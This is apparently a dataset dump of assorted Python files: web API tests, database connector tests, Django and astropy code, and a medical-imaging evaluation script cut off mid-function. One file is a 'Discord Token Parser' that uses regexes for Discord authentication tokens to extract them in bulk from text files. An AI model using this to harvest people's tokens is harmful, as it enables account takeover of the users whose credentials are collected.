content
stringlengths 0
894k
| type
stringclasses 2
values |
---|---|
# Copyright 2016 Internap
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from flask import Flask
from hamcrest import assert_that, is_
import json
import mock
import unittest
from ubersmith_remote_module_server.api import Api
class ApiTest(unittest.TestCase):
def setUp(self):
self.app = Flask('test_app')
self.api_client = self.app.test_client()
self.router = mock.Mock()
self.module1 = mock.Mock()
self.module2 = mock.Mock()
self.modules = {'module1': self.module1,
'module2': self.module2}
self.api = Api(self.modules, self.app, self.router)
def generate_module_path(self, module_name):
return '/{0}/'.format(module_name)
def test_list_implemented_methods(self):
self.router.list_implemented_methods.return_value = ['abcd', 'efgh']
output = self.api_client.get(self.generate_module_path('module1'))
self.router.list_implemented_methods.assert_called_with(self.module1)
assert_that(json.loads(output.data.decode(output.charset)), is_({
"implemented_methods": [
"abcd",
"efgh"
]
}))
def test_execute_method_returns_string(self):
self.router.invoke_method.return_value = 'simple string'
output = self.api_client.post(self.generate_module_path('module2'),
headers={'Content-Type': 'application/json'},
data=json.dumps(
{
"method": "remote_method",
"params": [],
"env": {
"variable1": "value1"
},
"callback": {}
}
))
self.router.invoke_method.assert_called_with(module=self.module2, method='remote_method', params=[], env={'variable1': 'value1'}, callback={})
assert_that(json.loads(output.data.decode(output.charset)), is_('simple string'))
def test_execute_method_returns_list(self):
self.router.invoke_method.return_value = ['a', 'b', 'c']
output = self.api_client.post(self.generate_module_path('module2'),
headers={'Content-Type': 'application/json'},
data=json.dumps(
{
"method": "remote_method",
"params": [],
"env": {
"variable1": "value1"
},
"callback": {}
}
))
self.router.invoke_method.assert_called_with(module=self.module2, method='remote_method', params=[], env={'variable1': 'value1'}, callback={})
assert_that(json.loads(output.data.decode(output.charset)), is_(['a', 'b', 'c']))
def test_invoking_unknown_module_returns_a_404(self):
output = self.api_client.post(self.generate_module_path('new_module'),
headers={'Content-Type': 'application/json'},
data=json.dumps(
{
"method": "remote_method",
"params": [],
"env": {
"variable1": "value1"
},
"callback": {}
}
))
assert_that(output.status_code, is_(404))
def test_listing_unknown_module_returns_a_404(self):
output = self.api_client.get(self.generate_module_path('new_module'))
assert_that(output.status_code, is_(404))
class NoTrailingSlashApiTest(ApiTest):
def generate_module_path(self, module_name):
return '/{0}'.format(module_name)
|
python
|
import concurrent.futures
import sqlite3
import pytest
from yesql.drivers.sio import sqlite
pytestmark = pytest.mark.asyncio
@pytest.fixture(autouse=True)
def connection(MockSQLiteConnection):
conn = MockSQLiteConnection.return_value
yield conn
MockSQLiteConnection.reset_mock()
sqlite3.connect.reset_mock()
@pytest.fixture(scope="module")
def connector() -> sqlite.SQLiteConnector:
connector = sqlite.SQLiteConnector(database="foo")
return connector
class TestSQLiteConnector:
@staticmethod
def test_initialize(connector: sqlite.SQLiteConnector, connection):
# Given
connector.initialized = False
# When
connector.initialize()
# Then
assert connector.initialized
assert connection.execute.called
@staticmethod
def test_initialize_done(connector: sqlite.SQLiteConnector, connection):
# Given
connector.initialized = True
# When
connector.initialize()
# Then
assert not connection.execute.called
@staticmethod
def test_initialize_concurrent(connector: sqlite.SQLiteConnector, connection):
# Given
connector.initialized = False
# When
with concurrent.futures.ThreadPoolExecutor() as pool:
futs = (
pool.submit(connector.initialize),
pool.submit(connector.initialize),
pool.submit(connector.initialize),
pool.submit(connector.initialize),
pool.submit(connector.initialize),
)
concurrent.futures.wait(futs)
# Then
assert connection.execute.call_count == 1
@staticmethod
def test_connection(connector: sqlite.SQLiteConnector, connection):
# When
with connector.connection():
...
# Then
assert sqlite3.connect.called
assert connection.rollback.called
@staticmethod
def test_connection_no_transaction(connector: sqlite.SQLiteConnector, connection):
# Given
connection.in_transaction = False
# When
with connector.connection():
...
# Then
assert sqlite3.connect.called
assert not connection.rollback.called
@staticmethod
def test_connection_provided(
connector: sqlite.SQLiteConnector, connection: sqlite3.Connection
):
# When
with connector.connection(connection=connection):
...
# Then
assert not sqlite3.connect.called
assert not connection.rollback.called
@staticmethod
def test_transaction(connector: sqlite.SQLiteConnector, connection):
# When
with connector.transaction():
...
# Then
assert connection.commit.called
@staticmethod
def test_transaction_rollback(connector: sqlite.SQLiteConnector, connection):
# When
with connector.transaction(rollback=True):
...
# Then
assert not connection.commit.called
@staticmethod
def test_close(connector: sqlite.SQLiteConnector):
# When
connector.close()
# Then
assert connector.initialized is False
@staticmethod
def test_open(connector: sqlite.SQLiteConnector):
# Given
connector.initialized = True
# Then
assert connector.open
@staticmethod
def test_get_explain_command(connector: sqlite.SQLiteConnector):
# Given
expected = connector.EXPLAIN_PREFIX
# When
cmd = connector.get_explain_command()
# Then
assert cmd == expected
@staticmethod
def test_get_explain_command_analyze(connector: sqlite.SQLiteConnector):
# Given
expected = connector.EXPLAIN_PREFIX
# When
cmd = connector.get_explain_command(analyze=True)
# Then
assert cmd == expected
@staticmethod
def test_get_explain_command_format(connector: sqlite.SQLiteConnector):
# Given
expected = connector.EXPLAIN_PREFIX
# When
cmd = connector.get_explain_command(analyze=True, format="json")
# Then
assert cmd == expected
|
python
|
import psycopg2
from flask import render_template, request, jsonify
from giraffe_api import app, db
q_metric = "select giraffe.init_metric(%(name)s, %(description)s)"
q_metric_value = "insert into giraffe.metric_value" \
"(db_timestamp, cluster, db, metric_id, integer_value, numeric_value) " \
"values(%(db_timestamp)s, %(cluster)s, %(db)s, %(metric_id)s, " \
"%(integer_value)s, %(numeric_value)s)"
@app.route('/receive', methods=['POST'])
def receive():
data = request.json
for (cluster_name, metrics) in data.items():
for metric in metrics:
db.execute(q_metric_value, {'db_timestamp': metric['timestamp'],
'cluster': metric['cluster'],
'db': metric['db'],
'metric_id': metric['id'],
'integer_value': metric['value'],
'numeric_value': None})
return 'OK'
@app.route('/propose', methods=['POST'])
def propose():
# Receives metric list from receiver
data = request.json
metrics = {}
for (metric_name, metric) in data.items():
id = db.get_value(q_metric, {'name': metric_name, 'description': metric['description']})
metrics[metric_name] = id
return jsonify({'result': 'ok', 'metrics': metrics})
@app.route("/", methods=['GET'])
def index():
return "Everything is OK"
|
python
|
from turtle import Turtle
class Scoreboard(Turtle):
def __init__(self):
super().__init__()
self.l_score = 0
self.r_score = 0
self.color('white')
self.hideturtle()
self.penup()
self.sety(200)
def increase_r_score(self):
self.r_score += 1
def increase_l_score(self):
self.l_score += 1
def display_score(self):
self.clear()
self.write(arg=f"{self.l_score} {self.r_score}", align='center', font=("Roboto", 40, 'normal'))
def game_over(self):
self.goto(0,0)
self.write(arg='GAME OVER', align='center', font=("Roboto", 40, 'normal'))
|
python
|
import cv2
import os
# source: https://stackoverflow.com/a/44659589
def image_resize(image, width = None, height = None, inter = cv2.INTER_AREA):
# initialize the dimensions of the image to be resized and
# grab the image size
dim = None
(h, w) = image.shape[:2]
# if both the width and height are None, then return the
# original image
if width is None and height is None:
return image
# check to see if the width is None
if width is None:
# calculate the ratio of the height and construct the
# dimensions
r = height / float(h)
dim = (int(w * r), height)
# otherwise, the height is None
else:
# calculate the ratio of the width and construct the
# dimensions
r = width / float(w)
dim = (width, int(h * r))
# resize the image
resized = cv2.resize(image, dim, interpolation = inter)
# return the resized image
return resized
class CFEVideoConf(object):
# Standard Video Dimensions Sizes
STD_DIMENSIONS = {
"360p": (480, 360),
"480p": (640, 480),
"720p": (1280, 720),
"1080p": (1920, 1080),
"4k": (3840, 2160),
}
# Video Encoding, might require additional installs
# Types of Codes: http://www.fourcc.org/codecs.php
VIDEO_TYPE = {
'avi': cv2.VideoWriter_fourcc(*'XVID'),
#'mp4': cv2.VideoWriter_fourcc(*'H264'),
'mp4': cv2.VideoWriter_fourcc(*'XVID'),
}
width = 640
height = 480
dims = (640, 480)
capture = None
video_type = None
def __init__(self, capture, filepath, res="480p", *args, **kwargs):
self.capture = capture
self.filepath = filepath
self.width, self.height = self.get_dims(res=res)
self.video_type = self.get_video_type()
# Set resolution for the video capture
# Function adapted from https://kirr.co/0l6qmh
def change_res(self, width, height):
self.capture.set(3, width)
self.capture.set(4, height)
def get_dims(self, res='480p'):
width, height = self.STD_DIMENSIONS['480p']
if res in self.STD_DIMENSIONS:
width, height = self.STD_DIMENSIONS[res]
self.change_res(width, height)
self.dims = (width, height)
return width, height
def get_video_type(self):
filename, ext = os.path.splitext(self.filepath)
if ext in self.VIDEO_TYPE:
return self.VIDEO_TYPE[ext]
return self.VIDEO_TYPE['avi']
|
python
|
from __future__ import absolute_import
from .uploader import GraphiteUploader
|
python
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2016-02-26 08:15
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('portal', '0006_auto_20160224_1510'),
]
operations = [
migrations.AlterField(
model_name='authenticateemail',
name='portal_user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='email_user', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='authenticateemailtask',
name='authenticate_email',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='task_email', to='portal.AuthenticateEmail'),
),
]
|
python
|
import json
from rentomatic.serializers import storageroom_serializer as srs
from rentomatic.domain.storageroom import StorageRoom
def test_serialize_domain_storageroom():
room = StorageRoom(
'f853578c-fc0f-4e65-81b8-566c5dffa35a',
size=200,
price=10,
longitude='-0.09998975',
latitude='51.75436293')
expected_json = """
{
"code": "f853578c-fc0f-4e65-81b8-566c5dffa35a",
"size": 200,
"price": 10,
"longitude": -0.09998975,
"latitude": 51.75436293
}
"""
assert json.loads(json.dumps(room, cls=srs.StorageRoomEncoder)) == json.loads(expected_json)
|
python
|
from django.shortcuts import get_list_or_404, get_object_or_404
from rest_framework.serializers import ModelSerializer, Serializer
from shop.models import Image, Product
from rest_framework import fields
class ImageSerializer(ModelSerializer):
mid_size = fields.ImageField()
class Meta:
model = Image
fields = ['id', 'name', 'variant', 'mid_size']
class ProductSerializer(ModelSerializer):
class Meta:
model = Product
fields = ['id', 'name', 'active']
class ImageAssociationSerializer(Serializer):
images = fields.ListField()
def save(self, product_id, **kwargs):
product = get_object_or_404(Product, id=product_id)
images = Image.objects.filter(id__in=self.validated_data['images'])
product.images.add(*images)
class RenamProductsValidation(Serializer):
products = fields.ListField()
name = fields.CharField(max_length=100, validators=[])
def save(self):
products = get_list_or_404(Product, id__in=self.validated_data['products'])
for product in products:
product.name = self.validated_data['name']
product.save()
return products
class ProductUpdateValidation(Serializer):
name = fields.CharField()
active = fields.BooleanField(default=False)
def save(self, **kwargs):
if self.instance:
for key, value in self.validated_data.items():
setattr(self.instance, key, value)
self.instance.save()
|
python
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
from __future__ import absolute_import, division, unicode_literals, print_function
import copy
import numpy as np
import warnings
from astropy.extern import six
from astropy.modeling.core import Model
from astropy.modeling.parameters import Parameter
from . import region
from .util import RegionError
def _toindex(value):
"""
Convert value to an int or an int array.
Input coordinates should be turned into integers
corresponding to the center of the pixel.
They are used to index the mask.
Examples
--------
>>> _toindex(np.array([-0.5, 0.49999]))
array([0, 0])
>>> _toindex(np.array([0.5, 1.49999]))
array([1, 1])
>>> _toindex(np.array([1.5, 2.49999]))
array([2, 2])
"""
indx = np.empty(value.shape, dtype=np.int32)
indx = np.floor(value + 0.5, out=indx)
return indx
class SelectorMask(Model):
"""
A mask model to be used with the `~gwcs.selector.RegionsSelector` transform.
For an IFU observation, the values of the mask
correspond to the region (slice) label.
Parameters
----------
mask : ndarray
An array of integers or strings where the values
correspond to a transform label in `~gwcs.selector.RegionsSelector` model.
If a transform is not defined the value shoul dbe set to 0 or " ".
"""
inputs = ('x', 'y')
outputs = ('z')
linear = False
fittable = False
def __init__(self, mask):
if mask.dtype.type is not np.unicode_:
self._mask = np.asanyarray(mask, dtype=np.int)
else:
self._mask = mask
if mask.dtype.type is np.string_:
self._no_transform_value = ""
else:
self._no_transform_value = 0
super(SelectorMask, self).__init__()
@property
def mask(self):
return self._mask
@property
def no_transform_value(self):
return self._no_transform_value
def evaluate(self, x, y):
indx = _toindex(x)
indy = _toindex(y)
return self.mask[indx, indy]
@classmethod
def from_vertices(cls, mask_shape, regions):
"""
Create a `~gwcs.selector.SelectorMask` from
polygon vertices read in from a json file.
Parameters
----------
mask_shape : tuple
shape of mask array
regions: dict
{region_label : list_of_polygon_vertices}
The keys in this dictionary should match the region labels
in `~gwcs.selector.RegionsSelector`.
The list of vertices is ordered in such a way that when traversed in a
counterclockwise direction, the enclosed area is the polygon.
The last vertex must coincide with the first vertex, minimum
4 vertices are needed to define a triangle.
Returns
-------
mask : `~gwcs.selectorSelectorMask`
Mask to be used with `~gwcs.selector.SelectorModel`.
Examples
-------_
mask = region.create_regions_mask_from_json((300,300), 'regions.json',
'region_schema.json')
"""
labels = np.array(list(regions.keys()))
mask = np.zeros(mask_shape, dtype=labels.dtype)
for rid, vert in regions.items():
pol = region.Polygon(rid, vert)
mask = pol.scan(mask)
return cls(mask)
class RegionsSelector(Model):
"""
A model which maps regions to their corresponding transforms.
It evaluates the model matching inputs to the correct region/transform.
Parameters
----------
inputs : list of str
Names of the inputs.
outputs : list of str
Names of the outputs.
selector : dict
Mapping of region labels to transforms.
Labels can be of type int or str, transforms are of type `~astropy.modeling.core.Model`
mask : `~gwcs.selector.SelectorMask`
Mask with region labels.
undefined_transform_value : float, np.nan (default)
Value to be returned if there's no transform defined for the inputs.
"""
_param_names = ()
linear = False
fittable = False
def __init__(self, inputs, outputs, selector, mask, undefined_transform_value=np.nan):
self._inputs = inputs
self._outputs = outputs
self.mask = mask.copy()
self._undefined_transform_value = undefined_transform_value
self._selector = copy.deepcopy(selector)
if " " in selector.keys() or 0 in selector.keys():
raise ValueError('"0" and " " are not allowed as keys.')
super(RegionsSelector, self).__init__(n_models=1)
# make sure that keys in mapping match labels in mask
labels_mask = self.labels_from_mask(mask.mask)
if not np.in1d(labels_mask, list(self._selector.keys()), assume_unique=True).all() or \
not np.in1d(list(self._selector.keys()), labels_mask, assume_unique=True).all():
raise ValueError("Labels don't match regions_mask.")
@staticmethod
def labels_from_mask(regions_mask):
"""
Parameters
----------
regions_mask : ndarray
An array where regions are indicated by int or str labels.
" " and 0 indicate a pixel on the detector which is not within any region.
Evaluating the model in these locations returns NaN or
``undefined_transform_value`` if provided.
"""
labels = np.unique(regions_mask).tolist()
try:
labels.remove(0)
except ValueError:
pass
try:
labels.remove('')
except ValueError:
pass
return labels
@staticmethod
def get_unique_regions(mask):
unique_regions = np.unique(mask).tolist()
try:
unique_regions.remove(0)
unique_regions.remove('')
except ValueError:
pass
try:
unique_regions.remove("")
except ValueError:
pass
return unique_regions
def set_input(self, rid):
"""
Sets one of the inputs and returns a transform associated with it.
"""
def _eval_input(x, y):
return self._selector[rid](x, y)
return _eval_input
def evaluate(self, x, y):
"""
Parameters
----------
x : float or ndarray
Input pixel coordinate.
y : float or ndarray
Input pixel coordinate.
"""
# Get the region labels corresponding to these inputs
indx = _toindex(x)
indy = _toindex(y)
rids = self.mask(indx, indy).flatten()
# Raise an error if all pixels are outside regions
if (rids == self.mask.no_transform_value).all():
raise RegionError("The input positions are not inside any region.")
# Create output arrays and set any pixels not withing regions to
# "undefined_transform_value"
no_trans_ind = (rids == self.mask.no_transform_value).nonzero()
outputs = [np.empty(rids.shape) for n in range(self.n_outputs)]
for out in outputs:
out[no_trans_ind] = self.undefined_transform_value
# Compute the transformations
x = x.flatten()
y = y.flatten()
uniq = self.get_unique_regions(rids)
for rid in uniq:
ind = (rids == rid)
result = self._selector[rid](x[ind], y[ind])
for j in range(self.n_outputs):
outputs[j][ind] = result[j]
return outputs
def __call__(self, *inputs, **kwargs):
"""
Evaluate this model using the given input(s) and the parameter values
that were specified when the model was instantiated.
"""
import itertools
parameters = self._param_sets(raw=True)
evaluate = self.evaluate
inputs, format_info = self.prepare_inputs(*inputs, **kwargs)
outputs = evaluate(*itertools.chain(inputs, parameters))
if self.n_outputs == 1:
outputs = (outputs,)
return self.prepare_outputs(format_info, *outputs, **kwargs)
def inverse(self):
"""
The inverse exists if all transforms have an inverse
and the mask has an inverse.
"""
selector_inverse = copy.deepcopy(self._selector)
for tr in selector_inverse:
selector_inverse[tr] = selector_inverse[tr].inverse
try:
mask = self.mask.inverse
except NotImplementedError:
raise
return self.__class__(self.outputs, self.inputs, selector_inverse,
mask, self.undefined_transform_value)
@property
def undefined_transform_value(self):
return self._undefined_transform_value
@undefined_transform_value.setter
def undefined_transform_value(self, value):
self._undefined_transform_value = value
@property
def inputs(self):
"""
The name(s) of the input variable(s) on which a model is evaluated.
"""
return self._inputs
@property
def outputs(self):
"""The name(s) of the output(s) of the model."""
return self._outputs
@property
def selector(self):
return self._selector
|
python
|
import colorama, os, ctypes, re, glob
from colorama import Fore
from sys import exit
def cls():
os.system("cls" if os.name=="nt" else "clear")
def fexit():
input(f"\n{Fore.RESET}Press Enter button for exit")
exit()
os.system("cls")
if __name__ == "__main__":
os.system("cls")
ctypes.windll.kernel32.SetConsoleTitleW("Discord Token Parser by GuFFy_OwO")
colorama.init()
print(f"{Fore.RESET}[{Fore.CYAN}1{Fore.RESET}] Check one file")
print(f"{Fore.RESET}[{Fore.CYAN}2{Fore.RESET}] Check many files")
print()
checktype = input(f"{Fore.CYAN}>{Fore.RESET} Select An Option{Fore.CYAN}:{Fore.RESET} ")
if "1" in checktype:
cls()
tokenFileName = input(f"{Fore.CYAN}>{Fore.RESET}Enter the name of the file in wich are the unparsed tokens{Fore.CYAN}:{Fore.RESET} ")
elif "2" in checktype:
cls()
tokenDirectoryName = input(f"{Fore.CYAN}>{Fore.RESET}Enter the directory of the files in wich are the unparsed tokens{Fore.CYAN}:{Fore.RESET} ")
if not os.path.exists(tokenDirectoryName):
print(tokenDirectoryName + " directory not exist.")
fexit()
else:
print("Invalid Option.")
fexit()
deleteDuplicates = input(f"{Fore.CYAN}>{Fore.RESET}Delete duplicates tokens? [Y/N]{Fore.CYAN}:{Fore.RESET} ")
cls()
if "2" in checktype:
try:
os.remove(f"{tokenDirectoryName}\\all_data.tmp")
except: None
open(f"{tokenDirectoryName}\\all_data.tmp", "a+")
print(f"Glue the files...\n")
files = glob.glob(f"{tokenDirectoryName}\\*.txt")
with open(f"{tokenDirectoryName}\\all_data.tmp", "w", encoding="utf-8") as result:
for file_ in files:
for line in open( file_, "r", encoding="utf-8"):
result.write(line)
tokenFileName = f"{tokenDirectoryName}\\all_data.tmp"
if not os.path.exists(tokenFileName):
print(tokenFileName + " not exist.")
fexit()
def main():
print(f"Parse tokens...")
try:
os.remove("Parsed Tokens.txt")
except: None
open("Parsed Tokens.txt", "a+")
tokens = []
for line in [x.strip() for x in open(f"{tokenFileName}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in re.findall(regex, line):
tokens.append(token)
if deleteDuplicates.lower() == "y":
tokens = list(dict.fromkeys(tokens))
tokens_str = "\n".join(tokens)
with open("Parsed Tokens.txt", "a", encoding="utf-8") as f:
f.write(tokens_str)
found = sum(1 for line in open("Parsed Tokens.txt", "r", encoding="utf-8"))
print(f"\nDone. Found {Fore.CYAN}{found}{Fore.RESET} tokens!")
try:
os.remove(f"{tokenDirectoryName}\\all_data.tmp")
except: None
fexit()
main()
|
python
|
# coding: utf-8
"""
"""
import torch
import torch.optim as optim
import torch.nn as nn
import os
import time
import copy
import numpy as np
import torch.nn.functional as F
from tensorboardX import SummaryWriter
from sklearn.metrics import confusion_matrix
from sklearn.metrics import roc_auc_score, f1_score
from visual_confuse_matrix import make_confusion_matrix
from dataset import genDataset, genExtraForEvalDataset
from model import SegClsModule
from sklearn.metrics import cohen_kappa_score
import argparse
import logging
import os
import sys
import torchvision.transforms as transforms
import cv2
import numpy as np
import math
import random
import yaml
from pathlib import Path
from loss import Weighted_Jaccard_loss
from utils import dice_coef, probs2one_hot
def setup_seed(seed):
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
np.random.seed(seed)
random.seed(seed)
torch.backends.cudnn.deterministic = True
def setup_logger(name, save_dir, distributed_rank, filename="log.txt"):
"""terminal and log file
name: application information
save_dir: log dir
distributed_rank: only host 0 can generate log
filename: log file name
"""
logger = logging.getLogger(name)
logger.setLevel(logging.DEBUG)
# don't log results for the non-master process
if distributed_rank > 0:
return logger
ch = logging.StreamHandler(stream=sys.stdout)
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter("%(asctime)s %(name)s %(levelname)s: %(message)s")
ch.setFormatter(formatter)
logger.addHandler(ch)
if save_dir:
fh = logging.FileHandler(os.path.join(save_dir, filename))
fh.setLevel(logging.DEBUG)
fh.setFormatter(formatter)
logger.addHandler(fh)
return logger
def set_visible_gpu(gpu_idex):
"""
to control which gpu is visible for CUDA user
set_visible_gpu(1)
print(os.environ["CUDA_DEVICE_ORDER"])
print(os.environ["CUDA_VISIBLE_DEVICES"])
"""
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = "{0}".format(gpu_idex)
def get_results(val_labels, val_outs, val_probs, save_cf_png_dir, save_metric_dir):
# first for probs
AUC_score = roc_auc_score(val_labels, val_probs)
F1_score = f1_score(val_labels, val_outs)
CM = confusion_matrix(val_labels, val_outs)
labels = ['True Neg','False Pos','False Neg','True Pos']
categories = ['0', '1']
make_confusion_matrix(CM,
group_names=labels,
categories=categories,
cmap='Blues',save_dir=save_cf_png_dir)
#make_confusion_matrix(CM, figsize=(8,6), cbar=False)
TN = CM[0][0]
FN = CM[1][0]
TP = CM[1][1]
FP = CM[0][1]
# Sensitivity, hit rate, recall, or true positive rate
TPR = TP/(TP+FN)
# Specificity or true negative rate
TNR = TN/(TN+FP)
# Precision or positive predictive value
PPV = TP/(TP+FP)
# Negative predictive value
NPV = TN/(TN+FN)
# Fall out or false positive rate
FPR = FP/(FP+TN)
# False negative rate
FNR = FN/(TP+FN)
# False discovery rate
FDR = FP/(TP+FP)
# Overall accuracy
ACC = (TP+TN)/(TP+FP+FN+TN)
result_str = "Sensitivity=%.3f, Specificity=%.3f, PPV=%.3f, NPV=%.3f, FPR=%.3f, FNR=%.3f, FDR=%.3f, ACC=%.3f, AUC=%.3f, F1_score=%.3f\n" % (TPR, TNR, PPV, NPV, FPR, FNR, FDR, ACC, AUC_score, F1_score)
save_dir = save_metric_dir
with open(save_dir, "a+") as f:
f.writelines([result_str])
return result_str
def eval_model(model, dataloaders, log_dir="./log/", logger=None, opt=None):
since = time.time()
if False:#opt.do_seg:
# eval lung segmentation
logger.info("-"*8+"eval lung segmentation"+"-"*8)
model.eval()
all_dices = []
all_dices_au = []
for batch_idx, (inputs, labels) in enumerate(dataloaders["tgt_lung_seg_val"], 0):
annotation = dataloaders["tgt_lung_seg_val"].dataset.annotations[batch_idx]
img_dir = annotation.strip().split(',')[0]
img_name = Path(img_dir).name
inputs = inputs.to(device)
# adjust labels
labels[labels==opt.xray_mask_value_dict["lung"]] = 1
labels = labels[:,-1].to(device)
labels = torch.stack([labels == c for c in range(2)], dim=1)
with torch.set_grad_enabled(False):
if opt.use_aux:
_, _, seg_logits, _, seg_logits_au = model(inputs)
else:
_, _, seg_logits, _, _ = model(inputs)
seg_probs = torch.softmax(seg_logits, dim=1)
predicted_mask = probs2one_hot(seg_probs.detach())
# change the infection to Lung
predicted_mask_lung = predicted_mask[:,:-1]
predicted_mask_lung[:,-1] += predicted_mask[:,-1]
dices = dice_coef(predicted_mask_lung, labels.detach().type_as(predicted_mask)).cpu().numpy()
all_dices.append(dices) # [(B,C)]
predicted_mask_lung = predicted_mask_lung.squeeze().cpu().numpy() # 3xwxh
mask_inone = (np.zeros_like(predicted_mask_lung[0])+predicted_mask_lung[1]*255).astype(np.uint8)
# save dir:
save_dir = os.path.join(opt.logs, "tgt_lung_seg_val", "eval")
#
if not os.path.exists(save_dir):
os.makedirs(save_dir)
cv2.imwrite(os.path.join(save_dir, img_name), mask_inone)
###################################################au
if opt.use_aux:
seg_probs_au = torch.softmax(seg_logits_au, dim=1)
predicted_mask_au = probs2one_hot(seg_probs_au.detach())
# change the infection to Lung
predicted_mask_lung_au = predicted_mask_au[:,:-1]
predicted_mask_lung_au[:,-1] += predicted_mask_au[:,-1]
dices_au = dice_coef(predicted_mask_lung_au, labels.detach().type_as(predicted_mask_au)).cpu().numpy()
all_dices_au.append(dices_au) # [(B,C)]
predicted_mask_lung_au = predicted_mask_lung_au.squeeze().cpu().numpy() # 3xwxh
mask_inone_au = (np.zeros_like(predicted_mask_lung_au[0])+predicted_mask_lung_au[1]*255).astype(np.uint8)
# save dir:
save_dir_au = os.path.join(opt.logs, "tgt_lung_seg_val_au", "eval")
#
if not os.path.exists(save_dir_au):
os.makedirs(save_dir_au)
cv2.imwrite(os.path.join(save_dir_au, img_name), mask_inone_au)
avg_dice = np.mean(np.concatenate(all_dices, 0), 0) #
logger.info("tgt_lung_seg_val:[%d/%d],dice0:%.03f,dice1:%.03f,dice:%.03f"
% (batch_idx, len(dataloaders['tgt_lung_seg_val'].dataset)//inputs.shape[0],
avg_dice[0], avg_dice[1], np.mean(np.concatenate(all_dices, 0))))
if opt.use_aux:
avg_dice_au = np.mean(np.concatenate(all_dices_au, 0), 0) #
logger.info("tgt_lung_seg_val_au:[%d/%d],dice0:%.03f,dice1:%.03f,dice:%.03f"
% (batch_idx, len(dataloaders['tgt_lung_seg_val'].dataset)//inputs.shape[0],
avg_dice_au[0], avg_dice_au[1], np.mean(np.concatenate(all_dices_au, 0))))
if True:
# eval infection segmentation and cls
logger.info("-"*8+"eval infection cls"+"-"*8)
model.eval()
val_gt = []
val_cls_pred = []
val_cls_probs = [] # for VOC
val_seg_pred = []
val_seg_probs = [] # for VOC
val_seg_probs_au = []
val_seg_pred_au = [] # for VOC
for batch_idx, (inputs, labels) in enumerate(dataloaders["tgt_cls_val"], 0):
inputs = inputs.to(device)
# adjust label
val_gt.append(labels.cpu().data.numpy())
with torch.set_grad_enabled(False):
annotation = dataloaders["tgt_cls_val"].dataset.annotations[batch_idx]
img_dir = annotation.strip().split(',')[0]
img_name = Path(img_dir).name
if opt.use_aux:
cls_logits, _, seg_logits, _, seg_logits_au = model(inputs)
else:
cls_logits, _, seg_logits, _, _ = model(inputs)
if opt.do_seg:
seg_probs = torch.softmax(seg_logits, dim=1)
val_seg_probs.append(seg_probs[:,-1:].detach().cpu().view(seg_probs.shape[0], 1, -1).max(-1)[0])
predicted_mask_onehot = probs2one_hot(seg_probs.detach())
# for save
predicted_mask = predicted_mask_onehot.squeeze().cpu().numpy() # 3xwxh
mask_inone = (np.zeros_like(predicted_mask[0])+predicted_mask[1]*128+predicted_mask[2]*255).astype(np.uint8)
# save dir:
save_dir = os.path.join(opt.logs, "tgt_cls_val", "eval")
#
if not os.path.exists(save_dir):
os.makedirs(save_dir)
cv2.imwrite(os.path.join(save_dir, img_name), mask_inone)
# seg2cls
preds_cls_seg = (predicted_mask_onehot[:,-1:].sum(-1).sum(-1) > 0).cpu().numpy().astype(np.uint8)
val_seg_pred.append(preds_cls_seg)
if opt.do_seg and opt.use_aux:
seg_probs_au = torch.softmax(seg_logits_au, dim=1)
val_seg_probs_au.append(seg_probs_au[:,-1:].detach().cpu().view(seg_probs_au.shape[0], 1, -1).max(-1)[0])
predicted_mask_onehot_au = probs2one_hot(seg_probs_au.detach())
# for save
predicted_mask_au = predicted_mask_onehot_au.squeeze().cpu().numpy() # 3xwxh
mask_inone_au = (np.zeros_like(predicted_mask_au[0])+predicted_mask_au[1]*128+predicted_mask_au[2]*255).astype(np.uint8)
# save dir:
save_dir_au = os.path.join(opt.logs, "tgt_cls_val_au", "eval")
#
if not os.path.exists(save_dir_au):
os.makedirs(save_dir_au)
cv2.imwrite(os.path.join(save_dir_au, img_name), mask_inone_au)
# seg2cls
preds_cls_seg_au = (predicted_mask_onehot_au[:,-1:].sum(-1).sum(-1) > 0).cpu().numpy().astype(np.uint8)
val_seg_pred_au.append(preds_cls_seg_au)
# cls
#print(cls_logits)
if opt.do_cls:
probs_cls = torch.softmax(cls_logits, dim=1)
val_cls_probs.append(probs_cls[...,1:].detach().cpu().numpy())
preds_cls = (probs_cls[...,1:] > 0.5).type(torch.long)
val_cls_pred.append(preds_cls.cpu().data.numpy())
if not os.path.exists(os.path.join(opt.logs, "cf")):
os.makedirs(os.path.join(opt.logs, "cf"))
val_gt = np.concatenate(val_gt, axis=0)
if opt.do_cls:
val_cls_pred = np.concatenate(val_cls_pred, axis=0)
val_cls_probs = np.concatenate(val_cls_probs, axis=0)
save_cf_png_dir = os.path.join(opt.logs, "cf", "eval_cls_cf.png")
save_metric_dir = os.path.join(opt.logs, "eval_metric_cls.txt")
result_str = get_results(val_gt, val_cls_pred, val_cls_probs, save_cf_png_dir, save_metric_dir)
logger.info("tgt_cls_val:[cls]: %s" % (result_str))
if opt.do_seg:
val_seg_pred = np.concatenate(val_seg_pred, axis=0)
val_seg_probs = np.concatenate(val_seg_probs, axis=0)
# seg2cls
save_cf_png_dir = os.path.join(opt.logs, "cf", "eval_seg_cf.png")
save_metric_dir = os.path.join(opt.logs, "eval_metric_seg.txt")
result_str = get_results(val_gt, val_seg_pred, val_seg_probs, save_cf_png_dir, save_metric_dir)
logger.info("tgt_seg_val:[seg2cls]: %s" % (result_str))
if opt.do_seg and opt.use_aux:
